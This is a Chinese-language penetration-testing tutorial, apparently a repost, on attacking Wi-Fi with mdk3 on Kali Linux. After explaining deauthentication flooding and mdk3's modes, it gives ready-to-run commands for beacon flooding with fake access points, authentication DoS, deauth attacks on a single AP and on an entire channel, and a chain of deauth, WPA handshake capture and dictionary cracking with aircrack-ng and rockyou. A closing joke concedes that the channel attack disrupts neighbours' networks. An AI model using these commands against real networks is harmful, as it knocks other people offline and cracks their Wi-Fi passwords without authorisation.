前言
本次依然使用Kali虛擬機(jī)系統(tǒng),win11主機(jī),網(wǎng)卡Ralink 802.11
配合mdk3進(jìn)行wifi偽造、連接設(shè)備查看、解除認(rèn)證攻擊。
本次實(shí)驗(yàn)只用于學(xué)習(xí)交流,攻擊目標(biāo)為自家的手機(jī)熱點(diǎn),請(qǐng)勿違法使用!
目錄
前言
1.Deauth攻擊原理
2.mdk3介紹
3.mdk實(shí)戰(zhàn)
準(zhǔn)備工作
3.1 mdk3創(chuàng)建虛擬wifi?
3..1.1 創(chuàng)建一個(gè)虛擬wifi
?3.1.2 創(chuàng)建大量虛擬wifi
3.2 掃描連接wifi的設(shè)備
3.3 向指定AP進(jìn)行Dos攻擊
3.4 向指定AP發(fā)起取消認(rèn)證攻擊
3.4.1攻擊單一Ap
3.4.2?信道(ch)攻擊AP?
4.mdk3實(shí)現(xiàn)無線網(wǎng)絡(luò)攻擊?
步驟一:使用mdk3強(qiáng)制解除驗(yàn)證解除連接的設(shè)備
步驟二:獲取握手?jǐn)?shù)據(jù)包
步驟三:密碼字典破解wifi密碼
1.Deauth攻擊原理
????????取消驗(yàn)證洪水攻擊,國際上稱之為De-authenticationFloodAttack,全稱即取消身份驗(yàn)證洪水攻擊或驗(yàn)證阻斷洪水攻擊,通常被簡稱為Deauth攻擊。是無線網(wǎng)絡(luò)拒絕服務(wù)攻擊的一種形式,它旨在通過欺騙從AP到客戶端單播地址的取消身份驗(yàn)證幀來將客戶端轉(zhuǎn)為未關(guān)聯(lián)的/未認(rèn)證的狀態(tài)。對(duì)于目前廣泛使用的無線客戶端適配器工具來說,這種形式的攻擊在打斷客戶端無線服務(wù)方面非常有效和快捷。一般來說,在攻擊者發(fā)送另一個(gè)取消身份驗(yàn)證幀之前,客戶站會(huì)重新關(guān)聯(lián)和認(rèn)證以再次獲取服務(wù)。攻擊者反復(fù)欺騙取消身份驗(yàn)證幀才能使所有客戶端持續(xù)拒絕服務(wù)。
????????需要說明的是,De-authenticationBroadcastAttack即取消身份驗(yàn)證廣播攻擊和De-
authenticationFloodAttack即取消身份驗(yàn)證洪水攻擊原理基本一致,只是在發(fā)送程度及使用工具上有所區(qū)別,但前者很多時(shí)候用于配合進(jìn)行無線中間人攻擊,而后者常用于純粹的無線D.O.S,所以很多不夠清楚的無線安全資料上會(huì)將兩者放在一起提及。
取消身份驗(yàn)證洪水攻擊具體步驟如下:
- 攻擊者先通過掃描工具識(shí)別出預(yù)攻擊目標(biāo)(無線接入點(diǎn)和所有已連接的無線客戶端)。
- 通過偽造無線接入點(diǎn)和無線客戶端來將含有de-authentication幀注入到正常無線網(wǎng)絡(luò)通信。此時(shí),無線客戶端會(huì)認(rèn)為所有數(shù)據(jù)包均來自無線接入點(diǎn)。
- 在將指定無線客戶端“踢出”無線網(wǎng)絡(luò)后,攻擊者可以對(duì)其他客戶端進(jìn)行同樣的攻擊,并可以持續(xù)進(jìn)行以確保這些客戶端無法連接AP。
- 盡管客戶端會(huì)嘗試再次連接AP,但由于攻擊者的持續(xù)攻擊,將會(huì)很快被斷開。
下圖為筆者繪制的取消身份驗(yàn)證洪水攻擊原理圖,可看到攻擊者對(duì)整個(gè)無線網(wǎng)絡(luò)發(fā)送了偽造的取消身份驗(yàn)證報(bào)文。
2.mdk3介紹
MDK3 (Murder Death Kill 3) 是一款開源的無線網(wǎng)絡(luò)攻擊工具,可以用于 Wi-Fi 功能的測試、漏洞利用、暴力破解和 DoS 攻擊等方面。MDK3 可以模擬各種攻擊場景,提供了許多有用的功能和選項(xiàng)。以下是 MDK3 的一些常用參數(shù):
MDK USAGE:
mdk3 <interface> <test_mode> [test_options] #mdk3用法:mdk3 網(wǎng)卡 測試模式 測試選項(xiàng)
TEST MODES: #測試模式
b - Beacon Flood Mode #信標(biāo)洪水模式 其實(shí)就是制造虛假AP干擾正常AP
OPTIONS:
-n <ssid>
Use SSID <ssid> instead of randomly generated ones #使用SSID <ssid>而不是隨機(jī)生成的
-f <filename>
Read SSIDs from file #從文件中讀取SSID
-v <filename>
Read MACs and SSIDs from file. #從文件讀取MAC和SSID
-d
Show station as Ad-Hoc #將站顯示為Ad-Hoc
-w
Set WEP bit (Generates encrypted networks) #設(shè)置WEP位(生成加密網(wǎng)絡(luò))
-g
Show station as 54 Mbit # 顯示工作站為54M
-t
Show station using WPA TKIP encryption #使用WPA TKIP加密顯示工作站
-a
Show station using WPA AES encryption #使用WPA AES加密顯示工作站
-m
Use valid accesspoint MAC from OUI database #使用來自O(shè)UI數(shù)據(jù)庫的有效訪問點(diǎn)MAC
-h
Hop to channel where AP is spoofed #跳到AP被欺騙的頻道
This makes the test more effective against some devices/drivers #這使得測試對(duì)于某些設(shè)備/驅(qū)動(dòng)程序更有效
But it reduces packet rate due to channel hopping. #但它減少了由于信道跳頻的分組速率
-c <chan>
Fake an AP on channel <chan>. If you want your card to hop on #在頻道<chan>上創(chuàng)建AP。如果你想要你的卡上跳
this channel, you have to set -h option, too! #這個(gè)通道,你必須設(shè)置-h選項(xiàng)!
-s <pps>
Set speed in packets per second (Default: 50) #設(shè)置速度(以秒為單位)(默認(rèn)值:50)
a - Authentication DoS mode # 身份驗(yàn)證洪水攻擊
OPTIONS:
-a <ap_mac>
Only test the specified AP #只測試指定的AP
-m
Use valid client MAC from OUI database #從OUI數(shù)據(jù)庫使用有效的客戶端MAC
-c
Do NOT check for test being successful #不要檢查測試是否成功
-i <ap_mac>
Perform intelligent test on AP (-a and -c will be ignored) #在AP上執(zhí)行智能測試(-a和-c將被忽略)
This test connects clients to the AP and reinjects sniffed data to keep them alive #此測試將客戶端連接到AP,并重新注入嗅探的數(shù)據(jù)以保持活動(dòng)
-s <pps>
Set speed in packets per second (Default: unlimited) #設(shè)置速度(以每秒包數(shù)為單位)(默認(rèn)值:無限制)
p - Basic probing and ESSID Bruteforce mode #基本探測和ESSID Bruteforce模式
Use -f and -t option to enable SSID Bruteforcing. #使用-f和-t選項(xiàng)來啟用SSID Bruteforcing。
OPTIONS:
-e <ssid>
Tell mdk3 which SSID to probe for # 告訴mdk3要探測的SSID
-f <filename>
Read lines from file for bruteforcing hidden SSIDs #從文件中讀取行以強(qiáng)制執(zhí)行隱藏的SSID
-t <bssid>
Set MAC adress of target AP #設(shè)置目標(biāo)AP的MAC地址
-s <pps>
Set speed (Default: unlimited, in Bruteforce mode: 300) # 設(shè)置速度(默認(rèn)值:無限制,在Bruteforce模式下:300)
-b <character set>
Use full Bruteforce mode (recommended for short SSIDs only!) #使用完全的Bruteforce模式(建議只使用短SSID?。? Use this switch only to show its help screen. #使用此開關(guān)僅顯示其幫助屏幕
d - Deauthentication / Disassociation Amok Mode #Deauthentication / Disassociation攻擊模式
Kicks everybody found from AP #踢掉每個(gè)客戶端
OPTIONS:
-w <filename>
Read file containing MACs not to care about (Whitelist mode) #白名單模式 讀取包含MAC的文件以運(yùn)行測試
-b <filename>
Read file containing MACs to run test on (Blacklist Mode) #黑名單模式 讀取文件中的運(yùn)行測試MAC運(yùn)行測試
-s <pps>
Set speed in packets per second (Default: unlimited) #設(shè)置速度(以每秒包數(shù)為單位)(默認(rèn)值:無限制)
-c [chan,chan,chan,...]
Enable channel hopping. Without providing any channels, mdk3 will hop an all #設(shè)置信道跳躍如果沒指定,mdk3會(huì)跳一個(gè)
14 b/g channels. Channel will be changed every 5 seconds. #14 b / g通道。信道每5秒更改一次
m - Michael shutdown exploitation (TKIP) #MAC關(guān)閉利用
Cancels all traffic continuously #連續(xù)取消所有流量
-t <bssid>
Set Mac address of target AP #設(shè)置目標(biāo)AP的Mac地址
-w <seconds>
Seconds between bursts (Default: 10) #突發(fā)之間的秒數(shù)(默認(rèn)值:10)
-n <ppb>
Set packets per burst (Default: 70) #設(shè)置每個(gè)數(shù)據(jù)包的數(shù)據(jù)包(默認(rèn)值:70)
-j
Use the new TKIP QoS-Exploit #使用新的TKIP QoS-Exploit
Needs just a few packets to shut AP down! #需要幾個(gè)數(shù)據(jù)包才能關(guān)閉AP!
-s <pps>
Set speed (Default: 400) #設(shè)置速度(默認(rèn)值:400)
w - WIDS/WIPS/WDS Confusion
將WDS與多認(rèn)證客戶端混淆,從而弄亂路由表
-e <SSID>
SSID of target WDS network #目標(biāo)WDS網(wǎng)絡(luò)的SSID
-c [chan,chan,chan...]
Use channel hopping #使用信道跳躍
-z
激活Zero_Chaos的WIDS攻擊
(驗(yàn)證客戶端從WDS到外部AP,使WIDS變得堅(jiān)果)
f - MAC filter bruteforce mode #MAC過濾器強(qiáng)制模式
此測試使用已知客戶端MAC地址的列表,并嘗試
在動(dòng)態(tài)改變的同時(shí)向給定AP認(rèn)證它們
其響應(yīng)超時(shí)以獲得最佳性能。它目前只工作
對(duì)正確拒絕開放身份驗(yàn)證請(qǐng)求的AP
-t <bssid>
Target BSSID #目標(biāo)BSSID
-m <mac>
Set the MAC adress range to use (3 bytes, i.e. 00:12:34) #設(shè)置要使用的MAC地址范圍(3字節(jié),即00:12:34)
Without -m, the internal database will be used #如果沒有-m,將使用內(nèi)部數(shù)據(jù)庫
-f <mac>
Set the MAC adress to begin bruteforcing with #設(shè)置MAC地址以開始強(qiáng)制
(Note: You can't use -f and -m at the same time) #(注意:不能同時(shí)使用-f和-m)
g - WPA Downgrade test #WPA降級(jí)測試
deauthenticates發(fā)送WPA加密數(shù)據(jù)包的站和AP。
有了這個(gè)測試,你可以檢查sysadmin是否會(huì)嘗試設(shè)置他的
網(wǎng)絡(luò)到WEP或禁用加密。 mdk3將使WEP和未加密
客戶端工作,所以如果系統(tǒng)管理員只是認(rèn)為“WPA是破碎”他
肯定不是這個(gè)工作的正確。
(這可以/應(yīng)該與社會(huì)工程相結(jié)合)
-t <bssid>
Target network #目標(biāo)網(wǎng)絡(luò)
MDK3 支持許多其他選項(xiàng)和功能,可以根據(jù)需要使用它們。請(qǐng)注意,在使用 MDK3 工具時(shí),請(qǐng)確保您已獲得適當(dāng)?shù)氖跈?quán)并了解您使用該工具的目的及法律限制。
3.mdk實(shí)戰(zhàn)
準(zhǔn)備工作
連接網(wǎng)卡:
切換網(wǎng)卡為監(jiān)聽模式(monitor):
?AP掃描:
3.1 mdk3創(chuàng)建虛擬wifi?
3..1.1 創(chuàng)建一個(gè)虛擬wifi
輸入下面命令來創(chuàng)建一個(gè)叫做“test_wifi”虛擬wifi。
mdk3 wlan0mon b -n test_wifi
?b -n:指定wifi名字?
?
?3.1.2創(chuàng)建大量虛擬wifi
輸入下面命令來創(chuàng)建大量在信道為1隨機(jī)名字的wifi
mdk3 wlan0mon b -g -c 1
該命令會(huì)在無線接口 wlan0mon 上使用 Beacon Flood Mode(信標(biāo)洪泛模式)攻擊,
目標(biāo)為 BSSID 地址為 b,
攻擊信道為 1。
其中 -g 參數(shù)表示使用泛洪模式,
即不斷發(fā)送帶有隨機(jī) SSID 和 MAC 地址的信標(biāo)廣播包,以干擾目標(biāo)網(wǎng)絡(luò)。通過這種方式可以使目標(biāo)AP在所有連接設(shè)備之外都變得不可用,從而對(duì)目標(biāo)網(wǎng)絡(luò)造成干擾或攻擊。
?
不一會(huì),就創(chuàng)建了幾十個(gè)wifi。
PS:偽AP的名字可以通過讀取本地文件創(chuàng)建?
mdk3 wlan0mon b -f /root/names.txt -c 6 -s 1000
?該命令會(huì)在無線接口 wlan0mon 上使用 Beacon Flood Mode(信標(biāo)洪泛模式)攻擊,目標(biāo)為隨機(jī) BSSID,攻擊信道為 6,同時(shí)將隨機(jī)生成的 SSID 使用 /root/names.txt 文件中的內(nèi)容進(jìn)行替換,1000ms??梢酝ㄟ^這種方式向附近的設(shè)備廣播大量的熱點(diǎn)信息,以干擾和誤導(dǎo)目標(biāo)網(wǎng)絡(luò)的用戶。
3.2掃描連接wifi的設(shè)備
使用下面命令可以掃描連接wifi的設(shè)備。請(qǐng)自行替換目標(biāo)wifi名字
mdk3 wlan0mon w -e <SSID>
3.3 向指定AP進(jìn)行Dos攻擊
這是一種驗(yàn)證請(qǐng)求攻擊模式:在這個(gè)模式里,軟件自動(dòng)模擬隨機(jī)產(chǎn)生的mac向目標(biāo)AP發(fā)起大量驗(yàn)證請(qǐng)求,可以導(dǎo)致AP忙于處理過多的請(qǐng)求而停止對(duì)正常連接客戶端的響應(yīng);這個(gè)模式常見的使用是在reaver窮據(jù)路由PIN碼,當(dāng)遇到AP被“pin死”時(shí),可以用這個(gè)模式來直接讓AP停止正常響應(yīng),迫使AP主人重啟路由,對(duì)于有些路由器防DOS的這個(gè)不好用。
?
輸入下面命令,向指定AP發(fā)起DOS攻擊。請(qǐng)自行替換目標(biāo)MAC地址。
mdk3 wlan0mon a -a [MAC]
?
這個(gè)攻擊對(duì)于我的路由器貌似沒什么效果,可能是我的路由器防DoS或者是攻擊時(shí)間太短請(qǐng)求都能夠正常處理。
3.4 向指定AP發(fā)起取消認(rèn)證攻擊
3.4.1攻擊單一Ap
使用以下命令可以強(qiáng)制解除驗(yàn)證解除連接的設(shè)備。請(qǐng)自行替換目標(biāo)MAC地址
mdk3 wlan0mon d 76:87:4E:74:34:06
該命令使用MDK3的Deauthentication Mode(強(qiáng)制下線模式)針對(duì)指定的MAC地址(76:87:4E:74:34:06)進(jìn)行攻擊。在攻擊期間,MDK3會(huì)發(fā)送大量的deauth幀,以迫使目標(biāo)設(shè)備斷開與Wi-Fi網(wǎng)絡(luò)的連接。
3.4.2?信道(ch)攻擊AP?
在這個(gè)模式下,軟件會(huì)向周圍所有可見AP發(fā)起循環(huán)攻擊…可以造成一定范圍內(nèi)的無線網(wǎng)絡(luò)癱瘓(當(dāng)然有白名單,黑名單模式),直到手動(dòng)停止攻擊
mdk3 wlan0mon d -c 11
該命令使用MDK3的Deauthentication Mode(強(qiáng)制下線模式)對(duì)Wi-Fi信道11上所有連接的設(shè)備進(jìn)行攻擊。在攻擊期間,MDK3會(huì)發(fā)送大量的deauth幀,以迫使目標(biāo)設(shè)備斷開與Wi-Fi網(wǎng)絡(luò)的連接。
?
快ctrl c停止,不然別人來找你了!
4.mdk3實(shí)現(xiàn)無線網(wǎng)絡(luò)攻擊?
步驟一:使用mdk3強(qiáng)制解除驗(yàn)證解除連接的設(shè)備
利用mdk3對(duì)指定AP進(jìn)行攻擊,發(fā)送取消認(rèn)證數(shù)據(jù)包,解除連接在AP上的設(shè)備
mdk3 wlan0mon d 76:87:4E:74:34:06
這個(gè)時(shí)候wifi已經(jīng)連接失敗!
步驟二:獲取握手?jǐn)?shù)據(jù)包
airodump-ng ?-c 1 --bssid 76:87:4E:74:34:06 -w /home/gyp-202031070222/桌面/wifi2 wlan0mon
?
步驟三:密碼字典破解wifi密碼
aircrack-ng -w /usr/share/wordlists/rockyou.txt?/home/gyp-202031070222/桌面/wifi2-01.cap
?
其實(shí)原理和之前的deauth攻擊差不多,讓其斷開連接后獲取握手?jǐn)?shù)據(jù)包,然后密碼字典破解!文章來源:http://www.zghlxwxcb.cn/news/detail-454385.html
?文章來源地址http://www.zghlxwxcb.cn/news/detail-454385.html
到了這里,關(guān)于滲透測試--6.2.mdk3攻擊wifi的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!